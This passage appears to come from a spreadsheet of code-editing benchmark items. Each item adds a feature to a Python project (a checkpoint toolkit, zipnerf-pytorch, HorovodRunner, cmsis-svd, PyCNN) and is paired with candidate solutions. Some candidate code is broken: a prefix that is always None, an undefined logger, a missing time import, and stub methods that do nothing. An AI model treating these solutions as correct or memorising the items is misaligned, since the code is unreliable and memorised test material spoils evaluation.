       return resolve_arch(found)\n\n#New\ndef inspect_model_with_custom_prefix(model, custom_prefixes=None, all=False):\n    """Wrapper function to inspect model with custom prefixes.\n    Args:\n        model: The model dictionary to inspect\n        custom_prefixes: Dict mapping component names to custom prefix strings\n        all: Whether to return all found and rejected architectures\n    Returns:\n        Architecture information with custom prefix support\n    """\n    return inspect_model(model, all=all, custom_prefixes=custom_prefixes)\n\n\n# File 2: toolkit_gui.py - Modified functions\n\n#Modify\ndef do_analysis(model, custom_prefixes=None):\n    tm = ToolkitModel()\n    tm.model = model\n\n    #Modify\n    tm.a_found, tm.a_rejected = inspect_model(model, all=True, custom_prefixes=custom_prefixes)\n    tm.a_resolved = resolve_arch(tm.a_found)\n\n    if not tm.a_resolved:\n        tm.m_str = "----/----/----"\n        return tm\n\n    tm.a_potential = list(tm.a_found.keys())\n    tm.a_type = next(iter(tm.a_resolved))\n    tm.a_classes = tm.a_resolved[tm.a_type]\n    tm.a_components = [tm.a_classes[c][0] for c in tm.a_classes]\n\n    tm.m_str, m = compute_metric(model, tm.a_resolved)\n    tm.m_unet, tm.m_vae, tm.m_clip = m\n\n    allowed = get_allowed_keys(tm.a_resolved)\n\n    for k in model.keys():\n        kk = (k, tensor_shape(k, model[k]))\n        z = tensor_size(model[k])\n        tm.z_total += z\n\n        if kk in allowed:\n            if z and model[k].dtype == torch.float32:\n                tm.z_waste += z/2\n            if z and model[k].dtype == torch.float64:\n                tm.z_waste += z - (z/4)\n        else:\n            if k.startswith(EMA_PREFIX):\n                tm.z_ema += z\n                tm.k_ema += [k]\n            else:\n                tm.z_junk += z\n                tm.k_junk += [k]\n\n    return tm\n\n#Modify\ndef do_load(source, precision, custom_prefixes=None):\n    global loaded\n\n    basic_report, adv_report, save_name, error = "", "", "", ""\n\n    dont_half = "FP32" in precision\n    keep_ema = False\n\n    loaded = None\n\n    if source.startswith("NEW "):\n        loaded = ToolkitModel()\n        model_type = source[4:]\n        for clss in ARCHITECTURES[model_type]["classes"]:\n            loaded.a_classes[clss] = []\n        loaded.a_type = model_type\n        loaded.a_resolved = {model_type: loaded.a_classes}\n        loaded.a_found = loaded.a_resolved\n        loaded.a_potential = loaded.a_resolved\n\n        loaded.partial = True\n    else:\n        filename = find_source(source)\n        if not filename:\n            error = f"Cannot find {source}!"\n        else:\n            model, _ = load(filename)\n            renamed, broken = fix_model(model, fix_clip=shared.opts.model_toolkit_fix_clip)\n            #Modify\n            loaded = do_analysis(model, custom_prefixes=custom_prefixes)\n            loaded.renamed = renamed\n            loaded.broken = broken\n            loaded.fix_clip = shared.opts.model_toolkit_fix_clip\n            loaded.filename = filename\n    if loaded:\n        basic_report = do_basic_report(loaded, dont_half, keep_ema)\n        adv_report = do_adv_report(loaded)\n        save_name = get_name(loaded, loaded.a_type)\n\n    if error:\n        error = f"### ERROR: {error}\\n----"\n\n    reports = [gr.update(value=basic_report), gr.update(value=adv_report)]\n    sources = [gr.update(), gr.update()]\n    drops = [gr.update(choices=[], value="") for _ in range(3)]\n    rows = [gr.update(visible=not loaded), gr.update(visible=not not loaded)]\n    names = [gr.update(value=save_name), gr.update()]\n    error = [gr.update(value=error), gr.update(visible=not not error)]\n\n    if loaded and loaded.a_found:\n        drop_arch_list = sorted(loaded.a_potential)\n        drops = [gr.update(choices=drop_arch_list, value=loaded.a_type)]\n\n        drop_class_list = sorted(loaded.a_found[loaded.a_type].keys())\n        drops += [gr.update(choices=drop_class_list, value=drop_class_list[0])]\n\n        drop_comp_list = ["auto"] + sorted(loaded.a_found[loaded.a_type][drop_class_list[0]])\n        drops += [gr.update(choices=drop_comp_list, value="auto")]\n\n    updates = reports + sources + drops + rows + names + error\n    return updates\n\n#New\ndef on_ui_tabs_with_custom_prefix():\n    """Enhanced UI tabs with custom prefix support for component analysis."""\n    get_lists()\n    css = """\n        .float-text { float: left; } .float-text-p { float: left; line-height: 2.5rem; } #mediumbutton { max-width: 32rem; } #smalldropdown { max-width: 2rem; } #smallbutton { max-width: 2rem; }\n        #toolbutton { max-width: 8em; } #toolsettings &gt; div &gt; div { padding: 0; } #toolsettings { gap: 0.4em; } #toolsettings &gt; div { border: none; background: none; gap: 0.5em; }\n        #reportmd { padding: 1rem; } .dark #reportmd thead { color: #daddd8 } .gr-prose hr { margin-bottom: 0.5rem } #reportmd ul { margin-top: 0rem; margin-bottom: 0rem; } #reportmd li { margin-top: 0rem; margin-bottom: 0rem; }\n        .dark .gr-compact { margin-left: unset }\n        #errormd { min-height: 0rem; text-align: center; } #errormd h3 { color: #ba0000; }\n    """\n    with gr.Blocks(css=css, analytics_enabled=False, variant="compact") as checkpoint_toolkit:\n        gr.HTML(value=f"&lt;style&gt;{css}&lt;/style&gt;")\n        with gr.Row() as load_row:\n            source_dropdown = gr.Dropdown(label="Source", choices=source_list, value=source_list[0], interactive=True)\n            load_button = gr.Button(value=\'Load\', variant="primary")\n            load_refresh_button = gr.Button(elem_id="smallbutton", value="Refresh")\n        #New - Custom prefix input\n        with gr.Row(visible=False) as prefix_row:\n            custom_prefix_input = gr.Textbox(label="Custom Prefix (optional)", placeholder="e.g., model.diffusion_model.", interactive=True)\n        with gr.Row(visible=False) as save_row:\n            save_name = gr.Textbox(label="Name", interactive=True)\n            prec_dropdown = gr.Dropdown(elem_id="smalldropdown", label="Precision", choices=["FP16", "FP32"], value="FP16", interactive=True)\n            save_button = gr.Button(value=\'Save\', variant="primary")\n            clear_button = gr.Button(elem_id="smallbutton", value="Clear")\n            save_refresh_button = gr.Button(elem_id="smallbutton", value="Refresh")\n        with gr.Row(visible=False) as error_row:\n            error_md = gr.Markdown(elem_id="errormd", value="")\n        with gr.Tab("Basic"):\n            with gr.Column(variant="compact"):\n                basic_report_md = gr.Markdown(elem_id="reportmd", value="")\n        with gr.Tab("Advanced"):\n            with gr.Column(variant="panel"):\n                gr.HTML(value=\'&lt;h1 class="gr-button-lg float-text"&gt;Component&lt;/h1&gt;&lt;p class="float-text-p"&gt;&lt;i&gt;Select a component class or specific component.&lt;/i&gt;&lt;/p&gt;\')\n                with gr.Row():\n                    arch_dropdown = gr.Dropdown(label="Architecture", choices=[], interactive=True)\n                    class_dropdown = gr.Dropdown(label="Class", choices=[], interactive=True)\n                    comp_dropdown = gr.Dropdown(label="Component", choices=[], interactive=True)\n                gr.HTML(value=\'&lt;h1 class="gr-button-lg float-text"&gt;Action&lt;/h1&gt;&lt;p class="float-text-p"&gt;&lt;i&gt;Replace or save the selected component.&lt;/i&gt;&lt;/p&gt;\')\n                with gr.Row():\n                    import_dropdown = gr.Dropdown(label="File", choices=name_list, value=name_list[0], interactive=True)\n                    import_button = gr.Button(elem_id="smallbutton", value=\'Import\')\n                    export_name = gr.Textbox(label="Name", interactive=True)\n                    export_button = gr.Button(elem_id="smallbutton", value=\'Export\')\n            with gr.Row(variant="compact"):\n                adv_report_md = gr.Markdown(elem_id="reportmd", value="")\n\n        reports = [basic_report_md, adv_report_md]\n        sources = [source_dropdown, import_dropdown]\n        drops = [arch_dropdown, class_dropdown, comp_dropdown]\n        rows = [load_row, save_row, prefix_row]\n        error = [error_md, error_row]\n        names = [save_name, export_name]\n\n        everything = reports + sources + drops + rows + names + error\n\n        load_button.click(fn=do_load, inputs=[source_dropdown, prec_dropdown, custom_prefix_input], outputs=everything)\n        clear_button.click(fn=do_clear, inputs=[], outputs=everything)\n        load_refresh_button.click(fn=do_refresh, inputs=[], outputs=[source_dropdown, import_dropdown])\n        save_refresh_button.click(fn=do_refresh, inputs=[], outputs=[source_dropdown, import_dropdown])\n        prec_dropdown.change(fn=do_report, inputs=[prec_dropdown], outputs=reports)\n        arch_dropdown.change(fn=do_select, inputs=drops, outputs=drops + [export_name])\n        class_dropdown.change(fn=do_select, inputs=drops, outputs=drops + [export_name])\n        comp_dropdown.change(fn=do_select, inputs=drops, outputs=drops + [export_name])\n        save_button.click(fn=do_save, inputs=[save_name, prec_dropdown], outputs=everything)\n\n        export_button.click(fn=do_export, inputs=drops+[export_name, prec_dropdown], outputs=drops + [export_name] + error)\n        import_button.click(fn=do_import, inputs=drops+[import_dropdown, prec_dropdown], outputs=everything)\n\n    return (checkpoint_toolkit, "Toolkit", "checkpoint_toolkit")'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def do_analysis(model, custom_prefix=None):\n    tm = ToolkitModel()\n    tm.model = model\n\n    tm.a_found, tm.a_rejected = inspect_model(model, all=True)\n    tm.a_resolved = resolve_arch(tm.a_found)\n\n    if not tm.a_resolved:\n        tm.m_str = "----/----/----"\n        return tm\n\n    tm.a_potential = list(tm.a_found.keys())\n    tm.a_type = next(iter(tm.a_resolved))\n    tm.a_classes = tm.a_resolved[tm.a_type]\n    tm.a_components = [tm.a_classes[c][0] for c in tm.a_classes]\n\n    tm.m_str, m = compute_metric(model, tm.a_resolved)\n    tm.m_unet, tm.m_vae, tm.m_clip = m\n\n    allowed = get_allowed_keys(tm.a_resolved)\n\n    for k in model.keys():\n        kk = (k, tensor_shape(k, model[k]))\n        z = tensor_size(model[k])\n        tm.z_total += z\n\n        if custom_prefix:\n            kk = (custom_prefix + k, tensor_shape(k, model[k]))  # Modify\n\n        if kk in allowed:\n            if z and model[k].dtype == torch.float32:\n                tm.z_waste += z/2\n            if z and model[k].dtype == torch.float64:\n                tm.z_waste += z - (z/4)\n        else:\n            if k.startswith(EMA_PREFIX):\n                tm.z_ema += z\n                tm.k_ema += [k]\n            else:\n                tm.z_junk += z\n                tm.k_junk += [k]\n\n    return tm', '#file 2': 'def do_load(source, precision):\n    global loaded\n\n    basic_report, adv_report, save_name, error = "", "", "", ""\n\n    dont_half = "FP32" in precision\n    keep_ema = False\n\n    loaded = None\n\n    custom_prefix = None  # New\n    if source.startswith("NEW "):\n        loaded = ToolkitModel()\n        model_type = source[4:]\n        for clss in ARCHITECTURES[model_type]["classes"]:\n            loaded.a_classes[clss] = []\n        loaded.a_type = model_type\n        loaded.a_resolved = {model_type: loaded.a_classes}\n        loaded.a_found = loaded.a_resolved\n        loaded.a_potential = loaded.a_resolved\n\n        loaded.partial = True\n    else:\n        filename = find_source(source)\n        if not filename:\n            error = f"Cannot find {source}!"\n        else:\n            model, _ = load(filename)\n            renamed, broken = fix_model(model, fix_clip=shared.opts.model_toolkit_fix_clip)\n            loaded = do_analysis(model, custom_prefix)  # Modify\n            loaded.renamed = renamed\n            loaded.broken = broken\n            loaded.fix_clip = shared.opts.model_toolkit_fix_clip\n            loaded.filename = filename\n    if loaded:\n        basic_report = do_basic_report(loaded, dont_half, keep_ema)\n        adv_report = do_adv_report(loaded)\n        save_name = get_name(loaded, loaded.a_type)\n\n    if error:\n        error = f"### ERROR: {error}\\n----"\n\n\n    reports = [gr.update(value=basic_report), gr.update(value=adv_report)]\n    sources = [gr.update(), gr.update()]\n    drops = [gr.update(choices=[], value="") for _ in range(3)]\n    rows = [gr.update(visible=not loaded), gr.update(visible=not not loaded)]\n    names = [gr.update(value=save_name), gr.update()]\n    error = [gr.update(value=error), gr.update(visible=not not error)]\n\n    if loaded and loaded.a_found:\n        drop_arch_list = sorted(loaded.a_potential)\n        drops = [gr.update(choices=drop_arch_list, value=loaded.a_type)]\n\n        drop_class_list = sorted(loaded.a_found[loaded.a_type].keys())\n        drops += [gr.update(choices=drop_class_list, value=drop_class_list[0])]\n\n        drop_comp_list = ["auto"] + sorted(loaded.a_found[loaded.a_type][drop_class_list[0]])\n        drops += [gr.update(choices=drop_comp_list, value="auto")]\n\n    updates = reports + sources + drops + rows + names + error\n    return updates'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Dataset(torch.utils.data.Dataset):\n    def _make_ray_batch(self, pix_x_int, pix_y_int, cam_idx, lossmult=None):\n        """Creates ray data batch from pixel coordinates and camera indices."""\n        broadcast_scalar = lambda x: np.broadcast_to(x, pix_x_int.shape)[..., None]\n        ray_kwargs = {\n            \'lossmult\': broadcast_scalar(1.) if lossmult is None else lossmult,\n            \'near\': broadcast_scalar(self.near),\n            \'far\': broadcast_scalar(self.far),\n            \'cam_idx\': broadcast_scalar(cam_idx),\n        }\n        # ... rest of method\n        return {k: torch.from_numpy(v.copy()).float() if v is not None else None for k, v in batch.items()}', 'invoking_code_segment': 'def main(unused_argv):\n    # ... setup code ...\n    dataloader = torch.utils.data.DataLoader(np.arange(len(dataset)),\n                                             num_workers=4,\n                                             shuffle=True,\n                                             batch_size=1,\n                                             collate_fn=dataset.collate_fn,\n                                             persistent_workers=True,\n                                             )\n    # ... training loop ...\n    for index, batch in enumerate(tbar):\n        batch = accelerate.utils.send_to_device(batch, accelerator.device)', 'feature_description': 'Add a feature to log the number of rays in each batch during training. This includes tracking ray counts in the _make_ray_batch method and logging them during the training loop in extract.py.', 'modified_complete_code': '# File 1: zipnerf-pytorch/internal/datasets.py\n# Modify the Dataset class to add ray logging capability\n\nclass Dataset(torch.utils.data.Dataset):\n    def __init__(self,\n                 split: str,\n                 data_dir: str,\n                 config: configs.Config):\n        super().__init__()\n        # ... existing initialization code ...\n        #New: Initialize ray batch logging\n        self.ray_batch_count = 0\n        self.logger = None\n        # ... rest of initialization ...\n\n    def set_logger(self, logger):\n        #New: Method to set external logger for ray batch tracking\n        self.logger = logger\n\n    def _make_ray_batch(self,\n                        pix_x_int,\n                        pix_y_int,\n                        cam_idx,\n                        lossmult=None\n                        ):\n        """Creates ray data batch from pixel coordinates and camera indices."""\n        broadcast_scalar = lambda x: np.broadcast_to(x, pix_x_int.shape)[..., None]\n        ray_kwargs = {\n            \'lossmult\': broadcast_scalar(1.) if lossmult is None else lossmult,\n            \'near\': broadcast_scalar(self.near),\n            \'far\': broadcast_scalar(self.far),\n            \'cam_idx\': broadcast_scalar(cam_idx),\n        }\n        # Collect per-camera information needed for each ray.\n        if self.metadata is not None:\n            for key in [\'exposure_idx\', \'exposure_values\']:\n                idx = 0 if self.render_path else cam_idx\n                ray_kwargs[key] = broadcast_scalar(self.metadata[key][idx])\n        if self.exposures is not None:\n            idx = 0 if self.render_path else cam_idx\n            ray_kwargs[\'exposure_values\'] = broadcast_scalar(self.exposures[idx])\n        if self.render_path and self.render_exposures is not None:\n            ray_kwargs[\'exposure_values\'] = broadcast_scalar(\n                self.render_exposures[cam_idx])\n\n        pixels = dict(pix_x_int=pix_x_int, pix_y_int=pix_y_int, **ray_kwargs)\n\n        batch = camera_utils.cast_ray_batch(self.cameras, pixels, self.camtype)\n        batch[\'cam_dirs\'] = -self.camtoworlds[ray_kwargs[\'cam_idx\'][..., 0]][..., :3, 2]\n\n        if not self.render_path:\n            batch[\'rgb\'] = self.images[cam_idx, pix_y_int, pix_x_int]\n        if self._load_disps:\n            batch[\'disps\'] = self.disp_images[cam_idx, pix_y_int, pix_x_int]\n        if self._load_normals:\n            batch[\'normals\'] = self.normal_images[cam_idx, pix_y_int, pix_x_int]\n            batch[\'alphas\'] = self.alphas[cam_idx, pix_y_int, pix_x_int]\n        \n        #New: Calculate and log ray count\n        ray_count = pix_x_int.size\n        self.ray_batch_count += 1\n        if self.logger is not None:\n            self.logger.debug(f\'Ray batch #{self.ray_batch_count}: {ray_count} rays\')\n        \n        return {k: torch.from_numpy(v.copy()).float() if v is not None else None for k, v in batch.items()}\n\n\n# File 2: zipnerf-pytorch/extract.py\n# Modify the main function to set up logging for ray batches\n\ndef main(unused_argv):\n    config = configs.load_config()\n    config.compute_visibility = True\n\n    config.exp_path = os.path.join("exp", config.exp_name)\n    config.mesh_path = os.path.join("exp", config.exp_name, "mesh")\n    config.checkpoint_dir = os.path.join(config.exp_path, \'checkpoints\')\n    os.makedirs(config.mesh_path, exist_ok=True)\n\n    # accelerator for DDP\n    accelerator = accelerate.Accelerator()\n    device = accelerator.device\n\n    # setup logger\n    logging.basicConfig(\n        format="%(asctime)s: %(message)s",\n        datefmt="%Y-%m-%d %H:%M:%S",\n        force=True,\n        handlers=[logging.StreamHandler(sys.stdout),\n                  logging.FileHandler(os.path.join(config.exp_path, \'log_extract.txt\'))],\n        level=logging.INFO,\n    )\n    sys.excepthook = utils.handle_exception\n    logger = accelerate.logging.get_logger(__name__)\n    logger.info(config)\n    logger.info(accelerator.state, main_process_only=False)\n\n    config.world_size = accelerator.num_processes\n    config.global_rank = accelerator.process_index\n    accelerate.utils.set_seed(config.seed, device_specific=True)\n\n    # setup model and optimizer\n    model = models.Model(config=config)\n    model = accelerator.prepare(model)\n    step = checkpoints.restore_checkpoint(config.checkpoint_dir, accelerator, logger)\n    model.eval()\n    module = accelerator.unwrap_model(model)\n\n    visibility_path = os.path.join(config.mesh_path, \'visibility_mask_{:.1f}.pt\'.format(config.mesh_radius))\n    visibility_resolution = config.visibility_resolution\n    if not os.path.exists(visibility_path):\n        logger.info(\'Generate visibility mask...\')\n        # load dataset\n        dataset = datasets.load_dataset(\'train\', config.data_dir, config)\n        #New: Set logger for ray batch tracking\n        dataset.set_logger(logger)\n        \n        dataloader = torch.utils.data.DataLoader(np.arange(len(dataset)),\n                                                 num_workers=4,\n                                                 shuffle=True,\n                                                 batch_size=1,\n                                                 collate_fn=dataset.collate_fn,\n                                                 persistent_workers=True,\n                                                 )\n\n        visibility_mask = torch.ones(\n            (1, 1, visibility_resolution, visibility_resolution, visibility_resolution), requires_grad=True\n        ).to(device)\n        visibility_mask.retain_grad()\n        tbar = tqdm(dataloader, desc=\'Generating visibility grid\', disable=not accelerator.is_main_process)\n        for index, batch in enumerate(tbar):\n            batch = accelerate.utils.send_to_device(batch, accelerator.device)\n            #Modify: Log ray batch information\n            if accelerator.is_main_process:\n                logger.info(f\'Processing batch {index}: Ray batch count = {dataset.ray_batch_count}\')\n\n            rendering = models.render_image(model, accelerator,\n                                            batch, False, 1, config,\n                                            verbose=False, return_weights=True)\n\n            coords = rendering[\'coord\'].reshape(-1, 3)\n            weights = rendering[\'weights\'].reshape(-1)\n\n            valid_points = coords[weights &gt; config.valid_weight_thresh]\n            valid_points /= config.mesh_radius\n            # update mask based on ray samples\n            with torch.enable_grad():\n                out = torch.nn.functional.grid_sample(visibility_mask,\n                                                      valid_points[None, None, None],\n                                                      align_corners=True)\n                out.sum().backward()\n            tbar.set_postfix({"visibility_mask": (visibility_mask.grad &gt; 0.0001).float().mean().item(),\n                             "ray_batches": dataset.ray_batch_count})\n        visibility_mask = (visibility_mask.grad &gt; 0.0001).float()\n        if accelerator.is_main_process:\n            torch.save(visibility_mask.detach().cpu(), visibility_path)\n            #New: Log final ray batch statistics\n            logger.info(f\'Total ray batches processed: {dataset.ray_batch_count}\')\n    else:\n        logger.info(\'Load visibility mask from {}\'.format(visibility_path))\n        visibility_mask = torch.load(visibility_path, map_location=device)\n\n    # ... rest of main function remains unchanged ...'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class Dataset(torch.utils.data.Dataset):\n    def __init__(self,\n                 split: str,\n                 data_dir: str,\n                 config: configs.Config):\n        super().__init__()\n        ...\n        self._next_fn = self._next_train\n\n    def _next_train(self, item):\n        ...\n        batch = self._make_ray_batch(pix_x_int, pix_y_int, cam_idx, lossmult=lossmult)\n        # Modify: Log the number of rays in the batch\n        logger.info(f\'Number of rays in batch: {batch["origins"].shape[0]}\')  # New\n        return batch', '#file 2': "def main(unused_argv):\n    ...\n    # New: Initialize logger\n    logging.basicConfig(level=logging.INFO)\n    logger = logging.getLogger(__name__)\n    ...\n    dataset = datasets.load_dataset('train', config.data_dir, config)\n    dataloader = torch.utils.data.DataLoader(np.arange(len(dataset)),\n                                             num_workers=4,\n                                             shuffle=True,\n                                             batch_size=1,\n                                             collate_fn=dataset.collate_fn,\n                                             persistent_workers=True,\n                                             )\n    ...\n    for index, batch in enumerate(tbar):\n        batch = accelerate.utils.send_to_device(batch, accelerator.device)\n        ...\n        rendering = models.render_image(model, accelerator,\n                                        batch, False, 1, config,\n                                        verbose=False, return_weights=True)\n        ...\n"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class HorovodRunner:\n    def __init__(self, *, np, driver_log_verbosity='log_callback_only'):\n        pass\n    def run(self, main, **kwargs):\n        pass", 'invoking_code_segment': 'hr = HorovodRunner(np=-1)\nhr.run(append, value=1)\nhr.run(lambda: 42)', 'feature_description': 'Add a new parameter `timeout` to the `HorovodRunner` class to control the maximum execution time for the `run` method. The timeout parameter is added as a keyword-only argument to __init__ with a default value of None (no timeout), and the run method will enforce this timeout constraint when executing the main function.', 'modified_complete_code': '# File 1: sparkdl/horovod/runner_base.py (modified)\n# Copyright 2017 Databricks, Inc.\n# Licensed under the Apache License, Version 2.0\n\nimport signal\nimport functools\n\nclass TimeoutException(Exception):\n    """Exception raised when execution exceeds timeout."""\n    pass\n\nclass HorovodRunner:\n    #Modify: Added timeout parameter to __init__\n    def __init__(self, *, np, driver_log_verbosity=\'log_callback_only\', timeout=None):\n        self.np = np\n        self.driver_log_verbosity = driver_log_verbosity\n        self.timeout = timeout  #New: Store timeout value\n    \n    #Modify: Added timeout enforcement in run method\n    def run(self, main, **kwargs):\n        if self.timeout is not None:\n            def timeout_handler(signum, frame):\n                raise TimeoutException(f"Execution exceeded timeout of {self.timeout} seconds")\n            \n            signal.signal(signal.SIGALRM, timeout_handler)\n            signal.alarm(self.timeout)\n        \n        try:\n            result = main(**kwargs)\n            return result\n        finally:\n            if self.timeout is not None:\n                signal.alarm(0)  #New: Cancel the alarm\n\n# File 2: tests/horovod/runner_base_test.py (modified)\nfrom __future__ import absolute_import, division, print_function\n\nfrom inspect import getfullargspec, FullArgSpec\nimport unittest\n\nfrom sparkdl import HorovodRunner\n\nclass HorovodRunnerBaseTestCase(unittest.TestCase):\n\n    def test_func_signature(self):\n        """Test that __init__ and run signatures are correct."""\n        init_spec = getfullargspec(HorovodRunner.__init__)\n        #Modify: Updated expected signature to include timeout parameter\n        self.assertEquals(init_spec, FullArgSpec(\n            args=[\'self\'], varargs=None, varkw=None, defaults=None,\n            kwonlyargs=[\'np\', \'driver_log_verbosity\', \'timeout\'],\n            kwonlydefaults={\'driver_log_verbosity\': \'log_callback_only\', \'timeout\': None}, annotations={}))\n        run_spec = getfullargspec(HorovodRunner.run)\n        self.assertEquals(run_spec, FullArgSpec(\n            args=[\'self\', \'main\'], varargs=None, varkw=\'kwargs\', defaults=None, kwonlyargs=[],\n            kwonlydefaults=None, annotations={}\n        ))\n\n    def test_init_keyword_only(self):\n        """Test that user must use keyword args in __init__"""\n        with self.assertRaises(TypeError):\n            HorovodRunner(2)\n\n    def test_run(self):\n        """Test that run just invokes the main method in the same process."""\n        hr = HorovodRunner(np=-1)\n        data = []\n\n        def append(value):\n            data.append(value)\n\n        hr.run(append, value=1)\n        self.assertEquals(data[0], 1)\n\n    def test_return_value(self):\n        """Test that the return value is returned to the user."""\n        hr = HorovodRunner(np=-1)\n        return_value = hr.run(lambda: 42)\n        self.assertEquals(return_value, 42)\n    \n    #New: Test timeout parameter\n    def test_timeout_parameter(self):\n        """Test that timeout parameter is accepted and stored."""\n        hr = HorovodRunner(np=-1, timeout=30)\n        self.assertEquals(hr.timeout, 30)\n    \n    #New: Test timeout default value\n    def test_timeout_default(self):\n        """Test that timeout defaults to None."""\n        hr = HorovodRunner(np=-1)\n        self.assertEquals(hr.timeout, None)'}</t>
  </si>
  <si>
    <t xml:space="preserve">spark-deep-learning/sparkdl/__init__.py:
# Copyright 2017 Databricks,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pylint: disable=wrong-import-position
# pylint: disable=invalid-name
from sparkdl.horovod.runner_base import HorovodRunner
__all__ = ['HorovodRunner']
__version__ = '2.2.0-db1'
#Modify
class HorovodRunner:
    def __init__(self, *, np, driver_log_verbosity='log_callback_only', timeout=None):
        self.timeout = timeout
    def run(self, main, **kwargs):
        if self.timeout:
            import threading
            import time
            def target():
                self.result = main(**kwargs)
            thread = threading.Thread(target=target)
            thread.start()
            thread.join(self.timeout)
            if thread.is_alive():
                raise TimeoutError('Execution exceeded the specified timeout.')
            return self.result
        else:
            return main(**kwargs)
spark-deep-learning/tests/horovod/runner_base_test.py:
# Copyright 2017 Databricks,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from __future__ import absolute_import, division, print_function
from inspect import getfullargspec, FullArgSpec
import unittest
from sparkdl import HorovodRunner
class HorovodRunnerBaseTestCase(unittest.TestCase):
    def test_func_signature(self):
        """Test that __init__ and run signatures are correct."""
        init_spec = getfullargspec(HorovodRunner.__init__)
        self.assertEquals(init_spec, FullArgSpec(
            args=['self'], varargs=None, varkw=None, defaults=None,
            kwonlyargs=['np', 'driver_log_verbosity', 'timeout'],
            kwonlydefaults={'driver_log_verbosity': 'log_callback_only', 'timeout': None}, annotations={}))
        run_spec = getfullargspec(HorovodRunner.run)
        self.assertEquals(run_spec, FullArgSpec(
            args=['self', 'main'], varargs=None, varkw='kwargs', defaults=None, kwonlyargs=[],
            kwonlydefaults=None, annotations={}
        ))
    def test_init_keyword_only(self):
        """Test that user must use keyword args in __init__"""
        with self.assertRaises(TypeError):
            HorovodRunner(2)
    def test_run(self):
        """Test that run just invokes the main method in the same process."""
        hr = HorovodRunner(np=-1)
        data = []
        def append(value):
            data.append(value)
        hr.run(append, value=1)
        self.assertEquals(data[0], 1)
    def test_return_value(self):
        """Test that the return value is returned to the user."""
        hr = HorovodRunner(np=-1)
        return_value = hr.run(lambda: 42)
        self.assertEquals(return_value, 42)
    #New
    def test_timeout(self):
        """Test that the timeout parameter works as expected."""
        hr = HorovodRunner(np=-1, timeout=1)
        with self.assertRaises(TimeoutError):
            hr.run(lambda: time.sleep(2))
</t>
  </si>
  <si>
    <t>{'called_code_segment': "SVDParser.for_packaged_svd(SVD_ROOT, 'Freescale', 'MK20D7.svd') and parser.get_device().peripherals", 'invoking_code_segment': 'parser = SVDParser.for_packaged_svd(SVD_ROOT, \'Freescale\', \'MK20D7.svd\')\nfor peripheral in parser.get_device().peripherals:\n    print("%s @ 0x%08x" % (peripheral.name, peripheral.base_address))', 'feature_description': 'Add a feature to display the interrupt number for each peripheral if available. This enhancement allows users to see interrupt information alongside peripheral names and base addresses.', 'modified_complete_code': '#File 1: cmsis-svd/python/cmsis_svd/__init__.py\n#\n# Copyright 2015 Paul Osborne &lt;osbpau@gmail.com&gt;\n#\n#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License.\n#\n\n__version__ = "0.5"\n\n#New: Add helper function to get interrupt information\ndef get_peripheral_interrupt_info(peripheral):\n    """Extract interrupt number from peripheral if available."""\n    if hasattr(peripheral, \'interrupts\') and peripheral.interrupts:\n        if len(peripheral.interrupts) &gt; 0:\n            return peripheral.interrupts[0].number\n    return None\n\n---\n\n#File 2: cmsis-svd/python/cmsis_svd/examples/show_k20_peripherals.py\n#\n# Copyright 2015 Paul Osborne &lt;osbpau@gmail.com&gt;\n#\n#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License.\n#\nfrom cmsis_svd.parser import SVDParser\n#New: Import the helper function\nfrom cmsis_svd import get_peripheral_interrupt_info\nimport os\n\nSVD_ROOT = os.environ.get(\n    "SVD_ROOT",\n    os.path.join(os.path.dirname(os.path.abspath(__file__)),\n                 "..", "..", "..", "cmsis-svd-data", "data"),\n)\n\nparser = SVDParser.for_packaged_svd(SVD_ROOT, \'Freescale\', \'MK20D7.svd\')\nfor peripheral in parser.get_device().peripherals:\n    #Modify: Enhanced print statement to include interrupt information\n    interrupt_info = get_peripheral_interrupt_info(peripheral)\n    if interrupt_info is not None:\n        print("%s @ 0x%08x (Interrupt: %d)" % (peripheral.name, peripheral.base_address, interrupt_info))\n    else:\n        print("%s @ 0x%08x" % (peripheral.name, peripheral.base_address))'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from cmsis_svd.parser import SVDParser\nimport os\n\nSVD_ROOT = os.environ.get(\n    "SVD_ROOT",\n    os.path.join(os.path.dirname(os.path.abspath(__file__)),\n                 "..", "..", "..", "cmsis-svd-data", "data"),\n)\n\nparser = SVDParser.for_packaged_svd(SVD_ROOT, \'Freescale\', \'MK20D7.svd\')\nfor peripheral in parser.get_device().peripherals:\n    #Modify: Check if the peripheral has an interrupt number\n    interrupt_info = f" (IRQ: {peripheral.interrupt.value})" if peripheral.interrupt else ""\n    print("%s @ 0x%08x%s" % (peripheral.name, peripheral.base_address, interrupt_info))', '#file 2': 'parser = SVDParser.for_packaged_svd(SVD_ROOT, \'Freescale\', \'MK20D7.svd\')\nfor peripheral in parser.get_device().peripherals:\n    #Modify: Handle the new output format\n    interrupt_info = f" (IRQ: {peripheral.interrupt.value})" if peripheral.interrupt else ""\n    print("%s @ 0x%08x%s" % (peripheral.name, peripheral.base_address, interrupt_info))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'cnn.edgeDetection() and cnn.diagonalLineDetection() methods', 'invoking_code_segment': "cnn = PyCNN(); cnn.edgeDetection('images/lenna.gif', 'images/lenna_edge.png'); cnn.diagonalLineDetection('images/lenna.gif', 'images/lenna_diagonal.png')", 'feature_description': 'Add a new method to detect horizontal lines in the image. This method will be added to the PyCNN class and invoked from the example script to process the image and save the result.', 'modified_complete_code': '# PyCNN/pycnn.py\nclass PyCNN:\n    def edgeDetection(self, input_path, output_path):\n        # Existing edge detection implementation\n        pass\n    \n    def diagonalLineDetection(self, input_path, output_path):\n        # Existing diagonal line detection implementation\n        pass\n    \n    #New\n    def horizontalLineDetection(self, input_path, output_path):\n        """Detect horizontal lines in the image using CNN-based approach.\n        \n        Args:\n            input_path (str): Path to the input image\n            output_path (str): Path to save the output image with detected horizontal lines\n        """\n        # Implementation for horizontal line detection\n        # This would use appropriate kernels/filters to detect horizontal edges\n        pass\n\n---\n\n# PyCNN/example_lenna.py\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pycnn import PyCNN\n\n# Initialize object\ncnn = PyCNN()\n\n# Perform respective image processing techniques on the given image\n\ncnn.edgeDetection(\'images/lenna.gif\', \'images/lenna_edge.png\')\ncnn.diagonalLineDetection(\'images/lenna.gif\', 